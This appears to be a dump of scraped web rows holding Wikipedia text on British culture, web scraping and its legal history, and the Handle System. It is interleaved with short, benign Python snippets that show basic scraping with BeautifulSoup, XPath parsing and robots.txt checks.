Berkeley x and David Hume; while Dugald Stewart, Thomas Reid and William Hamilton were major exponents of the Scottish "common sense" school. Two Britons are also notable for the ethical theory of utilitarianism, a moral philosophy first used by Jeremy Bentham and later by John Stuart Mill in his short work Utilitarianism. 469 Various styles of music have become popular in the UK, including the indigenous folk music of England, Wales, Scotland and Northern Ireland. Historically, there has been exceptional Renaissance music from the Tudor period, with masses, madrigals and lute music by Thomas Tallis, John Taverner, William Byrd, Orlando Gibbons and John Dowland. After the Stuart Restoration, an English tradition of dramatic masques, anthems and airs became established, led by Henry Purcell, followed by Thomas Arne and others. The German-born composer George Frideric Handel became a naturalised British citizen in 1727, when he composed the anthem Zadok the Priest for the coronation of George II; it became the traditional ceremonial music for anointing all future monarchs. Handel's many oratorios, such as his famous Messiah, were written in the English language. 470 In the second half of the 19th century, as Arthur Sullivan and his librettist W. S. 
Gilbert wrote their popular Savoy operas, Edward Elgar's wide range of music rivalled that of his contemporaries on the continent. Increasingly, however, composers became inspired by the English countryside and its folk music, notably Gustav Holst, Ralph Vaughan Williams, and Benjamin Britten, a pioneer of modern British opera. Among the many post-war composers, some of the most notable have made their own personal choice of musical identity: Peter Maxwell Davies (Orkney), Harrison Birtwistle (mythological), and John Tavener (religious). 471 Today, recent classical singers include: Alfie Boe, Bryn Terfel, Katherine Jenkins, Michael Ball, Roderick Williams, Russell Watson and Sarah Brightman, while Nicola Benedetti and Nigel Kennedy are renowned for their violin ability. 472 According to The New Grove Dictionary of Music and Musicians, the term "pop music" originated in Britain in the mid 1950s to describe rock and roll's fusion with the "new youth music". 473 The Oxford Dictionary of Music states that artists such as the Beatles and the Rolling Stones drove pop music to the forefront of popular music in the early 1960s. 474 Birmingham became known as the birthplace of heavy metal, with the band Black Sabbath starting there in the 1960s. 475 In the following years, Britain widely occupied a part in the development of rock music, with British acts pioneering hard rock; 476 raga rock; heavy metal; 477 space rock; glam rock; 478 Gothic rock, 479 psychedelic rock, 480 and punk rock. 481 British acts also developed neo soul and created dubstep. 482 The modern UK is known to produce some of the most prominent English-speaking rappers along with the United States, including Stormzy, Kano, Yxng Bane, Ramz, Little Simz and Skepta. 483 The Beatles have international sales of over 1 billion units and are the biggest-selling and most influential band in the history of popular music. 485 486 487 488 Other prominent British contributors to have influenced popular music over the last 50 years include the Rolling Stones, Pink Floyd, Queen, Led Zeppelin, the Bee Gees, and Elton John, all of whom have worldwide record sales of 200 million or more. 489 The Brit Awards are the BPI's annual music awards, and some of the British recipients of the Outstanding Contribution to Music award include the Who, David Bowie, Eric Clapton, Rod Stewart, the Police, and Fleetwood Mac (who are a British-American band). 490 More recent UK music acts that have had international success include George Michael, Oasis, Spice Girls, Radiohead, Coldplay, Arctic Monkeys, Robbie Williams, Amy Winehouse, Susan Boyle, Adele, Ed Sheeran, Lewis Capaldi, One Direction, Harry Styles and Dua Lipa. 491 A number of UK cities are known for their music. Acts from Liverpool have had 54 UK chart number 1 hit singles, more per capita than any other city worldwide. 492 Glasgow's contribution to music was recognised in 2008 when it was named a UNESCO City of Music. 493 Manchester played a role in the spread of dance music such as acid house, and from the mid 1990s, Britpop. London and Bristol are closely associated with the origins of electronic music sub-genres such as drum and bass and trip hop. 494 UK dance music traces its roots back to the Black British Sound System Culture and the New Age Traveller movement of the 60s and 70s, 495 it also has influences from New Wave and Synth-pop such as from bands New Order and Depeche Mode 496 and also has influences from the Chicago House and Detroit Techno scenes. 
In the late 80's, dance music exploded with Rave culture mainly Acid House tracks which were made mainstream with novelty records (such as Smart E's Sesame's Treet and the Prodigy's Charly) 497 and the Balearic sound brought back from the Ibiza club scene. This led on to genres such as UK Garage, Speed Garage, Drum and bass, Jungle, Trance and Dubstep. Influential UK dance acts past and present include 808 State, Orbital, the Prodigy, Underworld, Roni Size, Leftfield, Massive Attack, Groove Armada, Fatboy Slim, Faithless, Basement Jaxx, Chemical Brothers, Sub Focus, Chase Status, Disclosure, Calvin Harris and Fred Again. 498 Other influential UK DJs include Judge Jules, Pete Tong, Carl Cox, Paul Oakenfold, John Digweed and Sasha. 499 Major British artists include: the Romantics William Blake, John Constable, Samuel Palmer and J. M. W. Turner; the portrait painters Sir Joshua Reynolds and Lucian Freud; the landscape artists Thomas Gainsborough and L. S. Lowry; the pioneer of the Arts and Crafts Movement William Morris; the figurative painter Francis Bacon; the Pop artists Peter Blake, Richard Hamilton and David Hockney; the pioneers of Conceptual art movement Art Language; 500 the collaborative duo Gilbert and George; the abstract artist Howard Hodgkin; and the sculptors Antony Gormley, Anish Kapoor and Henry Moore. During the late 1980s and 1990s the Saatchi Gallery in London helped to bring to public attention a group of multi-genre artists who would become known as the "Young British Artists": Damien Hirst, Chris Ofili, Rachel Whiteread, Tracey Emin, Mark Wallinger, Steve McQueen, Sam Taylor-Wood and the Chapman Brothers are among the better-known members of this loosely affiliated movement. The Royal Academy in London is a key organisation for the promotion of the visual arts in the United Kingdom. Major schools of art in the UK include: the six-school University of the Arts London, which includes the Central Saint Martins College of Art and Design and Chelsea College of Art and Design; Goldsmiths, University of London; the Slade School of Fine Art (part of University College London); the Glasgow School of Art; the Royal College of Art; and The Ruskin School of Drawing and Fine Art (part of the University of Oxford). The Courtauld Institute of Art is a leading centre for the teaching of the history of art. Important art galleries in the United Kingdom include the National Gallery, National Portrait Gallery, Tate Britain and Tate Modern (the most-visited modern art gallery in the world, with around 4.7 million visitors per year). 501 The United Kingdom has had a considerable influence on the history of the cinema. The British directors Alfred Hitchcock, whose film Vertigo is considered by some critics as the best film of all time, 502 and David Lean who directed Lawrence of Arabia are among the most critically acclaimed directors of all time. 503 Recent popular directors include: Christopher Nolan, Sam Mendes, Steve McQueen, Richard Curtis, Danny Boyle, Tony Scott and Ridley Scott. 504 505 506 507 Many British actors have achieved international fame and critical success. Some of the most commercially successful films of all time have been produced in the United Kingdom, including two of the highest-grossing film franchises (Harry Potter and James Bond). 508 2019 was a particularly good year for British films which grossed around 10.3 billion globally which was 28.7% of global box office revenue. 509 UK box-office takings totalled 1.25 billion in 2019, with around 176 million admissions. 
510 In 2023 UK film and television studio stage space stands at 6.9 million sq ft, with 1 million sq ft added in the past year with more in development. 511 The annual BAFTA Film Awards are hosted by the British Academy of Film and Television Arts. 512 British cuisine developed from various influences reflective of its land, settlements, arrivals of new settlers and immigrants, trade and colonialism. The food of England has historically been characterised by its simplicity of approach and a reliance on the high quality of natural produce. 513 The traditional Sunday roast is one example, featuring a roasted joint, usually of beef, lamb, chicken or pork, often free range (and generally grass-fed, in the case of beef). Roasts are served with either roasted or boiled vegetables, Yorkshire pudding, and gravy. Other traditional meals include meat pies and various stews. A 2019 YouGov poll rated classic British food, the following had more than 80% of people like them who had tried them: Sunday roast, Yorkshire pudding, Fish and chips, Crumpets, and Full English breakfast. 514 The UK is home to a large selection of fine-dining experiences, in 2024 there were 187 Restaurants with a Michelin Star, 49 of them consider their cuisine to be 'Modern British'. 515 Sweet foods are common within British cuisine, and there is a long list of British desserts. Afternoon tea is a light afternoon meal served with tea in tea rooms and hotels around the United Kingdom, with the tradition dating back to around 1840. 516 Vegan and vegetarian diets have increased in Britain in recent years. In 2021, a survey found that 8% of British respondents eat a plant-based diet and 36% of respondents have a favourable view of plant-based diets. 517 The British Empire facilitated a knowledge of Indian cuisine with its "strong, penetrating spices and herbs". British cuisine has absorbed the cultural influence of those who have settled in Britain, producing hybrid dishes, such as chicken tikka masala. 518 The British have embraced world cuisine and regularly eat recipes or fast food from Europe, the Caribbean and Asia. The BBC, founded in 1922, is the UK's publicly funded radio, television and Internet broadcasting corporation, and is the oldest and largest broadcaster in the world. 519 520 521 It operates numerous television and radio stations in the UK and abroad and its domestic services are funded by the television licence. 522 The BBC World Service is an international broadcaster owned and operated by the BBC. It is the world's largest of any kind. 523 It broadcasts radio news, speech and discussions in more than 40 languages. 524 Other major players in the UK media include ITV, which operates 11 of the 15 regional television broadcasters that make up the ITV Network, 525 and Sky. 526 Newspapers produced in the United Kingdom include the Daily Mail, The Guardian, The Telegraph, The Times, and the Financial Times. 527 Magazines and journals published in the United Kingdom that have achieved worldwide circulation include The Spectator, The Economist, New Statesman, and Radio Times. London dominates the media sector in the UK: national newspapers and television and radio are largely based there, although MediaCityUK in Manchester is also a significant national media centre. Edinburgh and Glasgow, and Cardiff, are important centres of newspaper and broadcasting production in Scotland and Wales, respectively. 
528 The UK publishing sector, including books, directories and databases, journals, magazines and business media, newspapers and news agencies, has a combined turnover of around 20 billion and employs around 167,000 people. 529 In 2015, the UK published 2,710 book titles per million inhabitants, more than any other country, much of this being exported to other Anglophone countries. 530 In 2010, 82.5 per cent of the UK population were Internet users, the highest proportion among the 20 countries with the largest total number of users in that year. 531 The British video game industry is the largest in Europe, and, since 2022, the UK has the largest video game market in Europe by sales, overtaking Germany. 532 It is the world's third-largest producer of video games after Japan and the United States. 533 Association football, tennis, table tennis, badminton, rugby union, rugby league, rugby sevens, golf, boxing, netball, water polo, field hockey, billiards, darts, rowing, rounders and cricket originated or were substantially developed in the UK, with the rules and codes of many modern sports invented and codified in late 19th-century Victorian Britain. y A 2003 poll found that football is the most popular sport in the UK. 536 England is recognised by FIFA as the birthplace of club football, and the Football Association is the oldest of its kind, with the rules of football first drafted in 1863 by Ebenezer Cobb Morley. 537 Each of the Home Nations (England, Scotland, Wales and Northern Ireland) has its own football association, national team and league system, and each is individually a governing member of the International Football Association Board alongside FIFA. The English top division, the Premier League, is the most watched football league in the world. 538 The first international football match was contested by England and Scotland on 30 November 1872. 539 England, Scotland, Wales and Northern Ireland usually compete as separate countries in international competitions. 540 In 2003, rugby union was ranked the second most popular sport in the UK. 536 The sport was created in Rugby School, Warwickshire, and the first rugby international took place on 27 March 1871 between England and Scotland. 541 542 England, Scotland, Wales, Ireland, France and Italy compete in the Six Nations Championship, which is the premier international rugby union tournament in the northern hemisphere. Sports governing bodies in England, Scotland, Wales and Ireland organise and regulate the game separately. 543 Every four years, the Home Nations make a combined team known as the British and Irish Lions which tours Australia, New Zealand and South Africa. The United Kingdom hosted the Summer Olympic Games in 1908, 1948 and 2012, with London acting as the host city on all three occasions. Birmingham hosted the 2022 Commonwealth Games, the seventh time a constitute country in the United Kingdom hosted the Commonwealth Games (England, Scotland and Wales have each hosted the Commonwealth Games at least once). 544 The flag of the United Kingdom is the Union Flag (also referred to as the Union Jack). 545 It was created in 1606 by the superimposition of the flag of England, representing Saint George, on the flag of Scotland, representing Saint Andrew, and was updated in 1801 with the addition of Saint Patrick's Flag. 546 Wales is not represented in the Union Flag, as Wales had been conquered and annexed to England prior to the formation of the United Kingdom. 
The possibility of redesigning the Union Flag to include representation of Wales has not been completely ruled out. 547 The national anthem of the United Kingdom is "God Save the King", with "King" replaced with "Queen" in the lyrics whenever the monarch is a woman. Britannia is a national personification of the United Kingdom, originating from Roman Britain. 548 Besides the Lion and the Unicorn and the dragon of heraldry, the bulldog is an iconic animal and commonly represented with the Union Flag. 549 A now rare personification is a character originating in the 18th century, John Bull. 550 England, Wales, and Scotland each have a number of their own national symbols, including their national flags. Northern Ireland also has a number of symbols, many of which are shared with the Republic of Ireland. |
108 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-31 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
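As a rough sketch of the fetch-then-extract cycle described above, the snippet below downloads a page, pulls e-mail addresses out of its text (contact scraping) and copies them into a local spreadsheet. It reuses the requests, BeautifulSoup, re and pandas libraries already installed and imported in this notebook; the URL is only a placeholder, not a site actually scraped here.
# Minimal contact-scraping sketch: fetch a page, extract e-mail addresses,
# and store them in a local CSV file. The URL is a placeholder.
import re
import requests
import pandas as pd
from bs4 import BeautifulSoup

def scrape_contacts(url):
    response = requests.get(url, timeout=10)           # fetching: download the page
    soup = BeautifulSoup(response.text, "html5lib")    # parsing the mark-up
    text = soup.get_text(" ", strip=True)
    emails = set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", text))  # extracting
    return pd.DataFrame(sorted(emails), columns=["email"])

scrape_contacts("https://example.com").to_csv("contacts.csv", index=False)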
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
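Two of the approaches mentioned above, regular-expression matching and DOM parsing queried with XPath, can be contrasted in a few lines. This is only a sketch over a stub HTML string; lxml is an assumed extra dependency (pip install lxml) rather than one of the libraries installed earlier in this notebook.
# 1) regex matching, in the spirit of grep: quick, but fragile on messy mark-up
# 2) DOM parsing with XPath: more tolerant of formatting changes
import re
from lxml import html

raw = '<html><body><a href="/a">A</a> <a href="/b">B</a> <p>$19.99</p></body></html>'

prices = re.findall(r"\$\d+(?:\.\d{2})?", raw)   # regex over the raw text
tree = html.fromstring(raw)                      # build a DOM tree
links = tree.xpath("//a/@href")                  # query it with XPath

print(prices)   # ['$19.99']
print(links)    # ['/a', '/b']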
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include:
BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files.
Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it.
Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills.
ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites.
Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers.
InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization.
Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping.
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
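The list of anti-bot measures is cut off above, so rather than guess at it, the sketch below shows the complementary client-side etiquette a scraper can adopt so that such measures are less likely to be triggered: honouring robots.txt and rate-limiting requests. The base URL, user-agent string and delay are placeholders; urllib.robotparser is part of the Python standard library.
# Polite-scraping sketch: check robots.txt before fetching and pause between requests.
import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

BASE = "https://example.com"               # placeholder site
USER_AGENT = "polite-research-bot/0.1"     # placeholder identity

robots = RobotFileParser()
robots.set_url(urljoin(BASE, "/robots.txt"))
robots.read()

def polite_get(path, delay=2.0):
    url = urljoin(BASE, path)
    if not robots.can_fetch(USER_AGENT, url):
        return None                        # the site disallows this path for bots
    time.sleep(delay)                      # crude rate limiting between requests
    return requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)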
109 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hdl_(identifier) | The Handle System is the Corporation for National Research Initiatives' proprietary registry for assigning persistent identifiers, or handles, to information resources, and for resolving "those handles into the information necessary to locate, access, and otherwise make use of the resources". 1 As with handles used elsewhere in computing, Handle System handles are opaque, and encode no information about the underlying resource, being bound only to metadata regarding the resource. Consequently, the handles are not rendered invalid by changes to the metadata. The system was developed by Bob Kahn at the Corporation for National Research Initiatives (CNRI) as a part of the Digital Object Architecture (DOA). The original work was funded by the Defense Advanced Research Projects Agency (DARPA) between 1992 and 1996, as part of a wider framework for distributed digital object services, 2 and was thus contemporaneous with the early deployment of the World Wide Web, with similar goals. The Handle System was first implemented in autumn 1994, and was administered and operated by CNRI until December 2015, when a new "multi-primary administrator" (MPA) mode of operation was introduced. The DONA Foundation 3 now administers the system's Global Handle Registry and accredits MPAs, including CNRI and the International DOI Foundation. 4 The system currently provides the underlying infrastructure for such handle-based systems as Digital Object Identifiers and DSpace, which are mainly used to provide access to scholarly, professional and government documents and other information resources. CNRI provides specifications and the source code for reference implementations for the servers and protocols used in the system under a royalty-free "Public License", similar to an open source license. 5 Thousands of handle services are currently running. Over 1000 of these are at universities and libraries, but they are also in operation at national laboratories, research groups, government agencies, and commercial enterprises, receiving over 200 million resolution requests per month. [citation needed] The Handle System is defined in informational RFCs 3650, 1 3651 6 and 3652 7 of the Internet Engineering Task Force (IETF); it includes an open set of protocols, a namespace, and a reference implementation of the protocols. Documentation, software, and related information is provided by CNRI on a dedicated website. 8 Handles consist of a prefix which identifies a "naming authority" and a suffix which gives the "local name" of a resource. Similar to domain names, prefixes are issued to naming authorities by one of the "multi-primary administrators" of the system upon payment of a fee, which must be renewed annually. A naming authority may create any number of handles, with unique "local names", within their assigned prefixes. An example of a handle is 20.1000/100. In this example, which is the handle for the HANDLE.NET software license, 20.1000 is the prefix assigned to the naming authority (in this case, Handle.net itself) and 100 is the local name within that namespace. The local name may consist of any characters from the Unicode UCS-2 character set. The prefix also consists of any UCS-2 characters, other than the "/" separator. The prefixes consist of one or more naming authority segments, separated by periods, representing a hierarchy of naming authorities. 
Thus, in the example, 20 is the naming authority prefix for CNRI, while 1000 designates a subordinate naming authority within the 20 prefix. Other examples of top-level prefixes for the federated naming authorities of the DONA Foundation are 10 for DOI handles; 11 for handles assigned by the ITU; 21 for handles issued by the German Gesellschaft für wissenschaftliche Datenverarbeitung mbH Göttingen (GWDG), the scientific computing center of the University of Göttingen; and 86 for the Coalition of Handle Services China. Older "legacy" prefixes issued by CNRI before the "multi-primary administrator" (MPA) structure was instituted are typically four or five digits, as in handles administered by the University of Leicester. All prefixes must be registered in the Global Handle Registry through a DONA Foundation-approved registrar, normally for a fee. As with other uses of handles in computing, the handle is opaque; that is, it encodes no information about the underlying resource and provides only the means to retrieve metadata about the resource. This may be contrasted with a Uniform Resource Locator (URL), which may encode within the identifier such attributes of the resource as the protocol to be used to access the server holding the resource, the server host name and port number, and perhaps even location specifics such as the name of a file in the server file system containing the resource. In the Handle System, these specifics are not encoded in the handle, but are found in the metadata to which the handle is bound. The metadata may include many attributes of the information resource, such as its locations, the forms in which it is available, the types of access (e.g. "free" versus "paid") offered, and to whom. The processing of the metadata to determine how and where the resource should be accessed, and the provision of the resource to the user, are performed in a separate step, called "resolution", using a Resolver, a server which may be different from the ones involved in exchanging the handle for the metadata. Unlike URLs, which may become invalid if the metadata embedded within them becomes invalid, handles do not become invalid and do not need to change when locations or other metadata attributes change. This helps to prevent link rot, as changes in the information resource (such as location) need only be reflected in changes to the metadata, rather than in changes in every reference to the resource. Each handle may have its own administrator, and administration of the handles can be done in a distributed environment, similar to DNS domain names. The name-to-value bindings may also be secured, both via signatures to verify the data and via challenge-response to verify the transmission of the data, allowing handles to be used in trust management applications. It is possible for the same underlying information resource to be associated with multiple handles, as when two university libraries generate handles (and therefore possibly different sets of metadata) for the same book. The Handle System is compatible with the Domain Name System (DNS), but does not require it, unlike persistent identifiers such as PURLs or ARKs, which are similar to handles, but which utilise domain names. However, unlike these domain-name-based approaches, handles do require a separate prefix registration process and handle servers separate from the domain name servers. 
Handles can be used natively, or expressed as Uniform Resource Identifiers (URIs) through a namespace within the info URI scheme; 9 10 for example, 20.1000/100 may be written as the URI info:hdl/20.1000/100. Some Handle System namespaces, such as Digital Object Identifiers, are "info:" URI namespaces in their own right; for example, info:doi/10.1000/182 is another way of writing the handle for the current revision of the DOI Handbook 11 as a URI. Some Handle System namespaces define special presentation rules. For example, Digital Object Identifiers, which represent a high percentage of the extant handles, are usually presented with a "doi:" prefix: doi:10.1000/182. Any Handle may be expressed as a Uniform Resource Locator (URL) through the use of the generic HTTP proxy server: 12 Some Handle-based systems offer an HTTP proxy server that is intended for use with their own system such as: Implementation of the Handle System consists of Local Handle Services, each of which is made up of one or more sites that provide the servers that store specific handles. The Global Handle Registry is a unique Local Handle Service which stores information on the prefixes (also known as naming authorities) within the Handle System and can be queried to find out where specific handles are stored on other Local Handle Services within this distributed system. The Handle System website provides a series of implementation tools, notably the HANDLE.NET Software 13 and HANDLE.NET Client 